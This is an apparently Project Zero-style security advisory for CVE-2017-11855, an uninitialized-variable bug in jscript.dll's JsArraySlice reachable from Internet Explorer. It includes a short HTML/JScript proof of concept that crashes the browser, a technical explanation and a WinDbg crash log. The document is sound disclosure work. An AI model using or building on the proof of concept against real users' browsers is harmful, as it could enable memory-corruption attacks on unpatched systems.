Windows: Uninitialized variable in jscript!JsArraySlice
CVE-2017-11855
There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- By opening a malicious web page in Internet Explorer.
- [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.
The issue has been verified on 64-bit Windows 10 with the most recent patches applied.
PoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):
============================================
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var x = new URIError(new Array(), undefined, undefined);
String.prototype.localeCompare.call(x, new Date(0, 0, 0, 0, 0, 0, undefined));
Array.prototype.slice.call(1);
</script>
============================================
Technical details:
The issue is in jscript!JsArraySlice (Array.prototype.slice.call in the PoC above, all other lines are just fuzzer generated junk that puts the stack into a 'correct' state needed to demonstrate the issue).
JsArraySlice looks approximately like:
int JsArraySlice(CSession *session, VAR *this, VAR *ret, int num_args, VAR *args) {
VAR object;
VAR length;
NameTbl *nametable;
if(!ConvertToObject(session, this, &object, 0)) {
//set error and return
}
if(!IsJSObject(&object, &nametable)) {
//set error and return
}
if(nametable->GetVal(&g_sym_length, &length) < 0) {
//set error and return
}
if(length->type != TYPE_INT) {
ConvertToScalar(session, &length, &length, 3, 1);
}
...
}
The issue is that JsArraySlice() expects NameTBL::GetVal() to return an integer <0 if the input object does not contain the 'length' property. However in this case NameTBL::GetVal() will actually return 1. Also, in this case, the length VAR is *not* going to be initialized. Thus if NameTBL::GetVal() returns 1, ConvertToScalar() is going to be called with invalid arguments. Depending on the perceived (uninitialized) type of length VAR, this might lead to exploitable conditions including calling a virtual method on the uninitialized pointer (see below).
Debug log:
============================================
(a3c.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> r
rax=0000004e0061004e rbx=000000f42f0fb400 rcx=00007ffae4630904
rdx=0000000000000081 rsi=0000000000000002 rdi=00007ffae4630904
rip=00007ffae45a45fd rsp=000000f42f0fb1e0 rbp=000000f42f0fb2e0
<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=000000f42f0fb230 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=000000f42f0fb2a0 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=0000000000000080
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=5555555511140000 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000000 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=000002a7533c5a70 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8] ds:0000004e`00610056=????????????????
0:014> k
# Child-SP RetAddr Call Site
00 000000f4`2f0fb1e0 00007ffa`e45b548f jscript!InvokeDispatch+0xbd
01 000000f4`2f0fb380 00007ffa`e45adc2d jscript!AutBlock::AddRef+0x101f
02 000000f4`2f0fb3d0 00007ffa`e45e048f jscript!ConvertToScalar+0x51
03 000000f4`2f0fb440 00007ffa`e458265a jscript!JsArraySlice+0x10f
04 000000f4`2f0fb540 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
05 000000f4`2f0fb5f0 00007ffa`e458d75b jscript!NameTbl::InvokeInternal+0x135
06 000000f4`2f0fb6b0 00007ffa`e45d4d80 jscript!VAR::InvokeByDispID+0x87
07 000000f4`2f0fb700 00007ffa`e458265a jscript!JsFncCall+0xb0
08 000000f4`2f0fb780 00007ffa`e458b015 jscript!NatFncObj::Call+0x10a
09 000000f4`2f0fb830 00007ffa`e458cce0 jscript!NameTbl::InvokeInternal+0x135
0a 000000f4`2f0fb8f0 00007ffa`e45a7f18 jscript!VAR::InvokeByName+0x580
0b 000000f4`2f0fbaf0 00007ffa`e45b562b jscript!VAR::InvokeDispName+0x60
0c 000000f4`2f0fbb70 00007ffa`e4594ccf jscript!AutBlock::AddRef+0x11bb
0d 000000f4`2f0fbbc0 00007ffa`e45972cd jscript!CScriptRuntime::Run+0x665f
0e 000000f4`2f0fc520 00007ffa`e4597428 jscript!ScrFncObj::CallWithFrameOnStack+0x15d
0f 000000f4`2f0fc720 00007ffa`e4588b15 jscript!ScrFncObj::Call+0xb8
10 000000f4`2f0fc7c0 00007ffa`e45861eb jscript!CSession::Execute+0x265
11 000000f4`2f0fc920 00007ffa`e4586929 jscript!COleScript::ExecutePendingScripts+0x28b
12 000000f4`2f0fca00 00007ffa`e4586a06 jscript!COleScript::ParseScriptTextCore+0x239
13 000000f4`2f0fcaf0 00007ffa`ae439138 jscript!COleScript::ParseScriptText+0x56
14 000000f4`2f0fcb50 00007ffa`ae4f8f7d MSHTML!CActiveScriptHolder::ParseScriptText+0xb8
15 000000f4`2f0fcbd0 00007ffa`ae4f827c MSHTML!CScriptCollection::ParseScriptText+0x26d
16 000000f4`2f0fccb0 00007ffa`ae465a63 MSHTML!CScriptData::CommitCode+0x3b4
17 000000f4`2f0fce80 00007ffa`ae4657df MSHTML!CScriptData::Execute+0x267
18 000000f4`2f0fcf40 00007ffa`ae357ea1 MSHTML!CHtmScriptParseCtx::Execute+0xbf
19 000000f4`2f0fcf70 00007ffa`ae3b8880 MSHTML!CHtmParseBase::Execute+0x181
1a 000000f4`2f0fd000 00007ffa`ae3b846a MSHTML!CHtmPost::Broadcast+0x50
1b 000000f4`2f0fd040 00007ffa`ae467fae MSHTML!CHtmPost::Exec+0x39a
1c 000000f4`2f0fd240 00007ffa`ae469324 MSHTML!CHtmPost::Run+0x32
1d 000000f4`2f0fd270 00007ffa`ae463b99 MSHTML!PostManExecute+0x70
1e 000000f4`2f0fd2f0 00007ffa`ae463a60 MSHTML!PostManResume+0xa1
1f 000000f4`2f0fd330 00007ffa`ae44523c MSHTML!CHtmPost::OnDwnChanCallback+0x40
20 000000f4`2f0fd380 00007ffa`ae386e21 MSHTML!CDwnChan::OnMethodCall+0x1c
21 000000f4`2f0fd3b0 00007ffa`ae3adcb9 MSHTML!GlobalWndOnMethodCall+0x251
22 000000f4`2f0fd460 00007ffa`f1f61c24 MSHTML!GlobalWndProc+0xf9
23 000000f4`2f0fd4f0 00007ffa`f1f6156c USER32!UserCallWinProcCheckWow+0x274
24 000000f4`2f0fd650 00007ffa`afa629f7 USER32!DispatchMessageWorker+0x1ac
25 000000f4`2f0fd6d0 00007ffa`afa9ed04 IEFRAME!CTabWindow::_TabWindowThreadProc+0x5e7
26 000000f4`2f0ff920 00007ffa`e42c9586 IEFRAME!LCIETab_ThreadProc+0x3a4
27 000000f4`2f0ffa50 00007ffa`c8b92ed9 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
28 000000f4`2f0ffa80 00007ffa`f2268364 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x89
29 000000f4`2f0ffad0 00007ffa`f43e7091 KERNEL32!BaseThreadInitThunk+0x14
2a 000000f4`2f0ffb00 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:014> u rip
jscript!InvokeDispatch+0xbd:
00007ffa`e45a45fd 488b4008 mov rax,qword ptr [rax+8]
00007ffa`e45a4601 ff15c14d0700 call qword ptr [jscript!_guard_dispatch_icall_fptr (00007ffa`e46193c8)]
00007ffa`e45a4607 488d442458 lea rax,[rsp+58h]
00007ffa`e45a460c 458bc4 mov r8d,r12d
00007ffa`e45a460f 4889442448 mov qword ptr [rsp+48h],rax
00007ffa`e45a4614 488bd7 mov rdx,rdi
00007ffa`e45a4617 488d4580 lea rax,[rbp-80h]
00007ffa`e45a461b 498bce mov rcx,<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>
============================================
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: ifratric